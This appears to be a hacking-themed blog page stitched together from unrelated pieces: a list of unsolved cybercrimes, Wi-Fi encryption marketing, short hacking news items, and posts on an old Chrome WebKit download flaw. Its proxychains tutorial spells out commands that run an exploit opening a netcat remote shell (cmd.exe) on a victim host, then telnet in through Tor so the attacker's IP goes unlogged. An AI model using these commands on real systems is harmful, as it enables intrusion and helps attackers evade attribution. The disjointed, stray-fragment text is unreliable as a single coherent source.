Wireless hack,Wifi hack & security

The best criminal hacker is the one that isn’t caught—or even
identified. These are 10 of the most infamous unsolved computer crimes
(that we know about).
The most nefarious and crafty criminals are the ones who operate
completely under the radar. In the computing world security breaches
happen all the time, and in the best cases the offenders get tracked
down by the FBI or some other law enforcement agency.
But it’s the ones who go uncaught and unidentified (those who we didn’t
highlight in our Cyber Crime Hall Fame that are actually the best.
Attempting to cover your tracks is Law-Breaking 101; being able to
effectively do so, that’s another story altogether.
When a major cyber crime remains unsolved, though, it probably also
means that those of us outside the world of tech crime solving may
never even know the crime occurred.
These are some of the top headline-worthy highlights in the world of
unsolved computing crime—cases in which the only information available
is the ruin left in their wake.
The WANK Worm (October 1989)
Possibly the first “hacktivist” (hacking activist) attack, the WANK
worm hit NASA offices in Greenbelt, Maryland. WANK (Worms Against
Nuclear Killers) ran a banner (pictured) across system computers as
part of a protest to stop the launch of the plutonium-fueled,
Jupiter-bound Galileo probe. Cleaning up after the crack has been said
to have cost NASA up to a half of a million dollars in time and
resources. To this day, no one is quite sure where the attack
originated, though many fingers have pointed to Melbourne,
Australia-based hackers.
Ministry of Defense Satellite Hacked (February 1999)
A small group of hackers traced to southern England gained control of a
MoD Skynet military satellite and signaled a security intrusion
characterized by officials as “information warfare,” in which an enemy
attacks by disrupting military communications. In the end, the hackers
managed to reprogram the control system before being discovered. Though
Scotland Yard’s Computer Crimes Unit and the U.S. Air Force worked
together to investigate the case, no arrests have been made.
CD Universe Credit Card Breach (January 2000)
A blackmail scheme gone wrong, the posting of over 300,000 credit card
numbers by hacker Maxim on a Web site entitled “The Maxus Credit Card
Pipeline” has remained unsolved since early 2000. Maxim stole the
credit card information by breaching CDUniverse.com; he or she then
demanded $100,000 from the Web site in exchange for destroying the
data. While Maxim is believed to be from Eastern Europe, the case
remains as of yet unsolved.
Military Source Code Stolen (December 2000)
If there’s one thing you don’t want in the wrong hands, it’s the source
code that can control missile-guidance systems. In winter of 2000, a
hacker broke into government-contracted Exigent Software Technology and
nabbed two-thirds of the code for Exigent’s OS/COMET software, which is
responsible for both missile and satellite guidance, from the Naval
Research Lab in Washington, D.C. Officials were able to follow the
trail of the intruder “Leaf” to the University of Kaiserslautern in
Germany, but that’s where the trail appears to end.
Anti-DRM Hack (October 2001)
In our eyes, not all hackers are bad guys (as evidenced by our list of
the Ten Greatest Hacks of All Time); often they’re just trying to right
a wrong or make life generally easier for the tech-consuming public.
Such is the case of the hacker known as Beale Screamer, whose FreeMe
program allowed Windows Media users to strip digital-rights-management
security from music and video files. While Microsoft tried to hunt down
Beale, other anti-DRM activists heralded him as a crusader.

Dennis Kucinich on CBSNews.com (October 2003)
As Representative Kucinich’s presidential campaign struggled in the
fall of 2003, a hacker did what he could to give it a boost. Early one
Friday morning the CBSNews.com homepage was replaced by the campaign’s
logo. The page then automatically redirected to a 30-minute video
called “This is the Moment,” in which the candidate laid out his
political philosophy. The Kucinich campaign denied any involvement with
the hack, and whoever was responsible was not identified.
Hacking Your MBA App (March 2006)
Waiting on a college or graduate school decision is a nail-biting
experience, so when one hacker found out how to break into the
automated ApplyYourself application system in 2006, it was only natural
that he wanted to share the wealth. Dozens of top business schools,
including Harvard and Stanford, saw applicants exploiting the hack in
order to track their application statuses. The still-unknown hacker
posted the ApplyYourself login process on Business Week’s online
forums; the information was promptly removed and those who used it were
warned by schools that they should expect rejection letters in the
mail.
The 26,000 Site Hack Attack (Winter 2008)
MSNBC.com was among the largest of the thousands of sites used by a
group of unknown hackers earlier this year to redirect traffic to their
own JavaScript code hosted by servers known for malware. The malicious
code was embedded in areas of the sites where users could not see it,
but where hackers could activate it.
Supermarket Security Breach (February 2008)
Overshadowed only by a T.J Maxx breach in 2005, the theft of at least
1,800 credit and debit card numbers (and the exposure of about 4.2
million others) at supermarket chains Hannaford and Sweetbay (both
owned by the Belgium-based Delhaize Group) in the Northeast United
States and Florida remains unsolved more than six months later. Chain
reps and security experts are still unclear as to how the criminals
gained access to the system; the 2005 T.J.Maxx breach took advantage of
a vulnerability in the chain’s wireless credit transfer system, but
Hannaford and Sweetbay do not use wireless transfers of any sort.
Without more information, the difficulty in tracking down those
responsible grows exponentially.
Comcast.net Gets a Redirect (May 2008)
A devious hack doesn’t always mean finding a back door or particularly
crafty way into a secure network or server; sometimes it just means
that account information was compromised. Such was the case earlier
this year when a member of the hacker group Kryogeniks gained
unauthorized access to Comcast.net’s registrar, Network Solutions. The
domain name system (DNS) hack altered Comcast.net’s homepage to
redirect those attempting to access webmail to the hackers’ own page
(pictured). Spokespeople for Comcast and Network Solutions are still
unclear as to how the hackers got the username and password.

http://www.newcriminologist.com/article.asp?nid=2097

Expert shows how he can get into a Web app without touching the application itself

Chris Nickerson can gain access to a Web application without ever touching it — with just the right amount of reconnaissance, the so-called Tiger Team hacker can infiltrate the development team and compromise their machines.

“I can get into the application from the back side while on the outside, without touching” the app, says Nickerson, who gave attendees of the Open Web Application Security Project (OWASP) USA conference in New York today a taste of what he considers the big-picture cyber threats to organizations, targeted attacks for money or corporate espionage. “Closing all the holes in a Web application doesn’t make you secure,”  more

Xirrus asserts the importance of line-rate Wi-Fi encryption at the network edge to support non-compromised Wi-Fi performance. The rollout of 802.11n – which brings a 6X or more boost to Wi-Fi network performance – is mandating a reassessment of how and where wireless encryption is implemented in the network.

While typical thin AP + controller-based systems centralize this function, Xirrus’ Wi-Fi Array architecture distributes encryption and intelligence to the network edge to enable secure, line-rate encryption today plus the capability to upgrade to new technologies tomorrow.

The standardization of 802.11i in 2004, and its subsequent certification as WPA/WPA2 by the Wi-Fi Alliance, has ensured robust, highly secure deployment options for Wi-Fi networks. Best practices advocate these security technologies are deployed as a given in enterprise-grade wireless networks, and that users abandon the original WEP security standard. The implementation of the encryption portion of WPA/WPA2 places significant processing requirements on Wi-Fi equipment designs.

Network traffic flow and the distribution of processing power are key variables between distributed and centralized Wi-Fi architectures, and ultimately impact the performance limits of these systems. Several of the key differences are as follows:

1. Distributed Wi-Fi systems, characterized by processing resources within the Array/AP:

• Scale seamlessly with network growth
• Encryption performance is added as Arrays/APs are added
• Reduce core network traffic
• Wi-Fi traffic is encrypted/decrypted at the edge, and does not need to traverse the network to/from the controller
• Simplify and reduce the cost of redundant design
• Fewer users are impacted by outages, and proper coverage design can ensure continuous up time.

2. Centralized controller-based Wi-Fi systems, characterized by many thin Access Points connected to a central controller:

• Create an encryption processing choke point
• Centralized vendors state a 5X and greater hit in performance for encrypted vs. non-encrypted traffic
• Create a network traffic choke point
• All traffic is directed to the core, whether its ultimate destination is or not
• Create a significant single point of failure
• Expensive encryption engines must be replicated for redundancy.

The Xirrus Wi-Fi Array supports a modular hardware and software-reprogrammable architecture, which allows new encryption or other technologies to be implemented without wholesale product changes. Wi-Fi technology is continually evolving, with higher performance versions of 802.11n, advanced encryption technologies (e.g. 256 bit AES), and numerous other new 802.11 standards on the horizon. Upgradeability is a critical consideration for customers looking to implement a Wi-Fi network today and protect their investment in the future.

      Following India’s threat to shut down the Blackberry network in the country unless Research in Motion allows the government to snoop on Blackberry users made earlier this year, the country seems to have found a more pragmatic solution, and in a surprising move has publicly announced that they have finally managed to crack Blackberry’s encryption more

“>

The Weifang Public Security Bureau has successfully closed a case involving a hacker attack that caused a city-wide network paralysis.

In July of 2008, the Weifang Public Security Bureau Cyber Police received a report from the China Network Communications Corporation stating that the Weifang metropolitan network was under continuous hacker attack and this had caused a two day network outage for the entire city. Since over 90% of the users in Weifang subscribe to China Network Communications, the network outage affected over 400,000 users to include businesses, local government, schools, and hospitals.

Police pursued three suspects over a 3,000 kilometer chase passing through Tianjin, Beijing, Qingdao, Jinan and Shouguang. When the suspects were arrested, the police recovered laptops and eight other pieces of equipment. Two of the suspects charged with the crime worked as supervisors for a competing company and they confessed to hiring a third individual to hack the Weifang Corporation. The hacker used a botnet of over 8,000 computers to attack the company.

A team of hackers going by the name of the Greek Security Team has managed to hack into the system which is controlling the potentially world changing Large Hadron Collider experiment. In a move which was described as harmless but proving a point it was revealed that they managed to hack into one of the four detectors which are set to monitor how the system performs and exactly what is happening
On a rather more bullish note it was revealed that scientists have managed to cram an expected 4 days of research into just 24 hours and the team seems to be well ahead of schedule. But that does not mean that the end of the world is close by as October is the month in which scientists expect the first ‘hit’ – where two protons are expected to smash into each other at the speed of light.

This tutorial is about how to tunnel your all “console” data, e.g. telnet, netcat or exploits etc, through proxies so that your IP would not be logged there

Few free utilities are floating on internet for this purpose. We’ll use “proxychains” available on sourceforge.net. (http://proxychains.sourceforge.net/)
It’s available for *nix platforms only

Installation of proxychains on *nix platform (BackTrack3 in my case)

Downloaded file: proxychains-3.1.tar.gz
Untar the package:

# tar –xvzf proxychains-3.1.tar.gz

It will create a directory named “proxychains-3.1

Change the directory
# cd proxychains-3.1

Configure and install it
# ./configure
# make
# make install

(It’s always advisable to read “README” and “INSTALL” text files residing in the same directory before configuring and installing Linux applications)

Hope no error occurs while installing (otherwise Google is your friend)

Now /etc/proxychains.conf is the file where you can put your proxies to be used in different manners. But that’s always a frustrating job as proxies dies soon and hence your frequent interception will be required. So it’s better to rely on TOR proxy network for this. Proxychains has option for using TOR network for tunneling the data.

For that you don’t need to edit configuration file (proxychains.conf) in any way.

Example:
Suppose you have to run an exploit at your end which will in turn run netcat installed on remote machine (by you or some other intruder). After that of course you will telnet to the remote machine to get remote console.

(Exploit by Roelof Temming, unitoolz)
# ./unicodeexecute3.pl <remote_ip>:80 ‘c:\nc.exe –l –p 80 –d –e cmd.exe’
# telnet <remote_ip> 80

So in normal situation you will establish connection twice with remote machine ( IP logged !!!)
Here proxychains will help us to hide our identity.

# proxychains ./unicodeexecute3.pl <remote_ip>:80 ‘c:\nc.exe –l –p 80 –d –e cmd.exe’
# proxychains telnet <remote_ip> 80

…………….and you are safe now

But how would you assure that your IP has been changed? Or better to say its been spoofed?
Here comes the usage of one more Linux utility: “lynx”. It’s a kinda console browser.

# lynx www.google.com

and it’ll open up google on your console (obviously without graphics)

Edit the /etc/proxychains.conf file and comment the following line:
# Proxy DNS requests – no leak for DNS data
proxy_dns (comment out this using “#”)

Now open console and type
# proxychains lynx www.whatismyip.com or
# proxychains lynx www.findmyip.com

voila!!! your IP has been spoofed.

Obviously you need to configure TOR and Privoxy on you Linux machine before proxychains use them (that’s not a piece of cake  )

TOR and privoxy are already installed on your BT3 machine but you need to configure privoxy properly in order to use them successfully.

Happy Hacking !!!

Tutorial by

My Friend (Frozen sm0ke)

The new browser from Google tries to get the best from other browsers, but instead (well, at least in the current beta version), it seems to be doing quite the opposite.

The current beta uses an old version of WebKit – 525.13 – which is actually the same WebKit engine used by the old Safari v3.1. The current Safari version is v3.1.2, which fixed several critical issues, including the “blended threat” Carpet Bombing vuln, Google even mention that they use Safari v3.1 rendering engine in their own documentation (Thanks Yonatan Grabber for the information!).

On the other hand, Chrome borrowed (and modified) local resource files from the Mozilla project. And also, for some reason, in some cases there is an ActiveX plug-in loaded by Chrome, which might be an evidence of a capability of this browser to execute ActiveX controls. you can have a look at your own system where CHROME as been installed the path would be.
“c:\users\(yourusername)\AppData\Local\google\Chrome\Application\0.2.149.27\chrome.dll”

I really wonder why Google have taken several features from other browsers and mixed them all together. Security wise, it’s very problematic.
They’ll have to track all security vulnerabilities in those features, and fix them in Chrome too. This will probably be only after those vulnerabilities were fixed by the other vendors or were publicly reported. It will put Chrome users at risk for a long time.

Back to the WebKit issue. I’ve created a proof-of-concept which demonstrates the automatic download vulnerability that was already fixed by Apple. This PoC will automatically download a JAR file and place it in the the downloads folder (there are reports that in some cases it will download it to the Desktop, as in Safari. In those cases, the Safari-Pwns-IE exploit can be easily converted to Chrome-Pwns-IE exploit).
Unfortunately, whenever Google Chrome downloads a file, it creates a download bar at the bottom of the page, which seems, for the untrained eye, as part of the page. The downloaded filename is displayed as a button, and the one click on this button will execute the file. If the file is an executable (e.g. .EXE, .BAT, etc.), Windows Explorer will show a warning that this file was downloaded from the Internet. In this case, Google Chrome does a good job by setting the Zone.Identifier in the alternative data stream.

However, as was mentioned by pdp at his great Black Hat Talk this August, when Windows Explorer will try to execute a JAR file, it will automatically run the associated application, which in most cases is the JRE (Java Runtime Environment). JRE will not check the Zone.Identifier in the alternative data stream, and will execute the JAR file with no warning. JAR file, of-course, should be treated as any other executable file. This is again a sort of a “blended threat”. Two small issues in different products, when blended together create a much larger problem.

Google Chrome isn’t officially out yet, but security researchers have already picked the browser apart to discover a security vulnerability.

The WebKit engine used inside Chrome leaves it vulnerable to the infamous Safari carpetbombing flaw, security researcher Aviv Raff warns. The flaw stems from a combination of a vulnerability in Apple Safari WebKit and a Java security bug, security blogger Ryan Naraine.

As a result Windows users of the beta software might be tricked into downloading malicious files onto their desktop. Raff has published a harmless proof-of-concept exploit in order to illustrate his concerns.

Apple patched the vulnerability with Safari v3.1.2, but the underlying software behind Chrome is based on older code, hence the vulnerability.
Security watchers warn further vulnerabilities are bound to arise. Against this many are praising the speed and built-in security features of the browser. Chrome features built-in sandboxing for each tab, anti-phishing technology and a privacy (ie smut-surfing) mode. ®

Note :- if u want to see the exploit really working then use Chrome